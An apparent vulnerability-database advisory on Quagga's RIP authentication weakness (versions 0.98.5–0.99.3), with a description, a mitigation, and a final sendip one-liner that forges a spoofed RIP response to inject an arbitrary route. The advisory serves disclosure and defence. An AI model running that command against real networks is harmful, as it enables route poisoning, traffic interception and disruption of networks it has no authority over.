Quagga Remote Information-Disclosure and Route-Injection Vulnerabilities

vendor:

Quagga

by:

SecurityFocus

7.5

CVSS

HIGH

Information-Disclosure and Route-Injection

200

CWE

Product Name: Quagga

Affected Version From: 0.98.5

Affected Version To: 0.99.3

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

Quagga Remote Information-Disclosure and Route-Injection Vulnerabilities

Quagga is susceptible to remote information-disclosure and route-injection vulnerabilities. The application fails to properly ensure that required authentication and protocol configuration options are enforced. These issues allow remote attackers to gain access to potentially sensitive network-routing configuration information and to inject arbitrary routes into the RIP routing table. This may aid malicious users in further attacks against targeted networks.

Mitigation:

Ensure that authentication and protocol configuration options are enforced.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/17808/info
 
Quagga is susceptible to remote information-disclosure and route-injection vulnerabilities. The application fails to properly ensure that required authentication and protocol configuration options are enforced.
 
These issues allow remote attackers to gain access to potentially sensitive network-routing configuration information and to inject arbitrary routes into the RIP routing table. This may aid malicious users in further attacks against targeted networks.
 
Quagga versions 0.98.5 and 0.99.3 are vulnerable to these issues; other versions may also be affected.

sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p rip -rv 1 -rc 2 -re 2:0:192.168.36.0:255.255.255.0:0.0.0.0:1 192.168.69.100